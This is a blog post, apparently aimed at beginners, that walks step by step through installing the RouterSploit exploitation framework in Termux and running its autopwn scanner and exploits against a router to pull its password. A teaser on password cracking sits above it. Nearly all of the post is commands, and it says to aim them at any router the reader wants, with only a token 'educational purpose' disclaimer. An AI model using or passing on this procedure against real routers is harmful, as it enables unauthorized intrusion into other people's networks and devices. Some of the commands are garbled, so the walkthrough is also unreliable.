Skip to main content

Featured

How to Hack/Crack Password

  What is Password Cracking? Password cracking is the process of attempting to gain Unauthorized access to restricted systems using common passwords or algorithms that guess passwords. In other words, it’s an art of obtaining the correct password that gives access to a system protected by an authentication method. Password cracking employs a number of techniques to achieve its goals. The cracking process can involve either comparing stored passwords against word list or use algorithms to generate passwords that match In this Tutorial, we will introduce you to the common password cracking techniques and the countermeasures you can implement to protect systems against such attacks. Topics covered in this tutorial What is password strength? Password cracking techniques Password Cracking Tools Password Cracking Counter Measures Hacking Assignment: Hack Now! What is password strength? Password strength is the measure of a password’s efficiency to resist password cracking attacks . The s...

How to install RouterSploit in Termux

 HOW TO DOWNLOAD AND INSTALL ROUTERSPLOIT ON TERMUX?


After successfully download and install Termux give these following commands

$ pkg update && pkg upgrade

$ pkg install python -y

$ pkg install python2 -y
[Here python2 have no any work but when you download and install routersploit you get many errors. So solve many errors problem you can download python2]

$ pkg install git

$ pkg install pip

$ git clone https://github.com/reverse-shell/routersploit
[ Copy this link 👉 https://github.com/reverse-shell/routersploit ]

$ ls

$ cd routersploit

$ pip2 install -r requirement.txt

$ pip2 install requests
[ It will be taken few minutes for install. Don’t skip it ]

$ pip install future

$ python rsf.py
[ Then routersploit tool is install successfully]

Now your routersploit tool is ready for use.

rsf > show all

rsf > use scanners/autopwn

rsf > show options

rsf > set target { your ip}
[ For get ip, go to settings>wifi
Then copy ip of router which you want to use]

rsf > set http_port 80 vulnerability

rsf > run
Now you vulnerability process get start. This process take few minutes to scan Vulnerability to this router. After scan Vulnerability you can copy this password which interface is like [+]
Then give commands

rsf > use {your vulnerability text }

rsf > set target {router IP }

rsf > run


Disclaimer : This post is just for educational purpose try it on your own risk if you cause any harm to your device using this then i will not be responsible for it for any enquiry contact me on my social media handles!!!


Instagram: 
harsh11_x


Twitter: harshdev_11


Join our Telegram Channel : Join 
For latest updates and best content


Comments

Popular Posts